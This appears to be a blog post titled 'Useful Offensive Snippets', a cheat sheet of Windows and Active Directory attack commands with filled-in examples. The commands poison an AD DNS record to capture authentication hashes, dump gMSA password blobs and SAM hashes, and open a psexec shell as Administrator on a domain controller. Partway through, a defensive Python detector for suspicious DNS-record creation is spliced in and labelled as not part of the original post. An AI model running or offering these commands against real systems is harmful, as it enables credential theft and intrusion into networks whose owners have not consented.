Useful Offensive Snippets
Jul 13, 2022
I will update this post regularly; I am starting with a few of my most commonly used snippets.
Windows
SMB Connect
smbclient -U <USER> //<HOST>/<SHARE>
Example
smbclient -U Diddy.Doodat //pwned.com/Backup
Add DNS record kerberos
This can be used to capture authentication hashes if you identify a service that will look up a specific DNS record.
python3 dnstool.py -u '<DOMAIN>\<USER>' -p <PASSWORD> -r pwned.hacker.com -a add -t A -d <DOMAIN IP> <DNS IP>
Example
python3 dnstool.py -u 'hacked\diddy.doodat' -p OMGJonathanScott -r pwned.hacker.com -a add -t A -d 10.10.10.12 86.32.12.233
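From the defender's side, a record added this way shows up as a new dnsNode object in Active Directory. The following is an added example, not part of the original post: it filters directory-service object-creation events (Event ID 5137) for DNS records created by accounts that are neither DNS admins nor a machine registering its own host name. It assumes directory service change auditing is enabled on the zone and that events have been exported to dictionaries; the DNS_ADMINS allowlist and the sample events are constructed.

```python
import re

# Assumption: accounts allowed to create DNS records by hand (hypothetical name).
DNS_ADMINS = {"dnsadmin"}

def parse_dns_dn(object_dn):
    """Return (record, zone) for a DN under CN=MicrosoftDNS, else None."""
    rdns = re.split(r"(?<!\\),", object_dn)  # split on unescaped commas
    if len(rdns) < 3 or rdns[2].strip().upper() != "CN=MICROSOFTDNS":
        return None
    record = rdns[0].split("=", 1)[1]
    zone = rdns[1].split("=", 1)[1]
    return record, zone

def suspicious_dns_creations(events, admins=DNS_ADMINS):
    """Flag dnsNode creations by accounts outside the expected set."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 5137 or ev.get("ObjectClass") != "dnsNode":
            continue
        parsed = parse_dns_dn(ev.get("ObjectDN", ""))
        if parsed is None:
            continue
        record, zone = parsed
        user = ev.get("SubjectUserName", "").lower()
        if user in admins:
            continue
        # Policy choice in this example: a machine account ("NAME$")
        # registering its own host name is treated as expected.
        if user.endswith("$") and user[:-1] == record.lower():
            continue
        findings.append({"user": user, "record": record, "zone": zone})
    return findings

ZONE_DN = "DC=hacker.com,CN=MicrosoftDNS,DC=DomainDnsZones,DC=hacker,DC=com"
# Constructed sample events shaped like 5137 EventData fields.
SAMPLE_EVENTS = [
    {"EventID": 5137, "SubjectUserName": "WS01$", "ObjectClass": "dnsNode",
     "ObjectDN": "DC=ws01," + ZONE_DN},
    {"EventID": 5137, "SubjectUserName": "diddy.doodat", "ObjectClass": "dnsNode",
     "ObjectDN": "DC=pwned," + ZONE_DN},
    {"EventID": 5137, "SubjectUserName": "diddy.doodat", "ObjectClass": "user",
     "ObjectDN": "CN=temp,CN=Users,DC=hacker,DC=com"},
    {"EventID": 5137, "SubjectUserName": "dnsadmin", "ObjectClass": "dnsNode",
     "ObjectDN": "DC=intranet," + ZONE_DN},
]

if __name__ == "__main__":
    for finding in suspicious_dns_creations(SAMPLE_EVENTS):
        print(finding)
```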
Dump gMSA password blobs
python3 gMSADumper.py -u '<USER>' -p '<PASSWORD>' -d <DOMAIN>
Example
python3 gMSADumper.py -u 'diddy.doodat' -p 'OMGJonathanScott' -d pwned.hacker.com
Mount SMB share to Linux Host
mount -t cifs //<HOST>/<SHARE> /tmp/mnt
Example
mount -t cifs //128.11.2.121/Pwned /tmp/mnt
Shell from Linux with Impacket (psexec)
impacket-psexec -k -no-pass <DOMAIN>/<USER>@<HOST>
Example
impacket-psexec -k -no-pass hacked.com/Administrator@dc.hacked.com
Dump SAM hashes on Linux
impacket-secretsdump -sam SAM -system SYSTEM local
Linux
Fix Clock Skew Error
Sync the local clock when connecting to a target system fails because the clock skew is too great.
sudo ntpdate <NTP SERVER IP>
Example
sudo ntpdate 10.11.1.211
Mount VHD
guestmount --add <IMAGE>.vhd --inspector --ro -v /tmp/vhd
Example
guestmount --add leaked.vhd --inspector --ro -v /tmp/vhd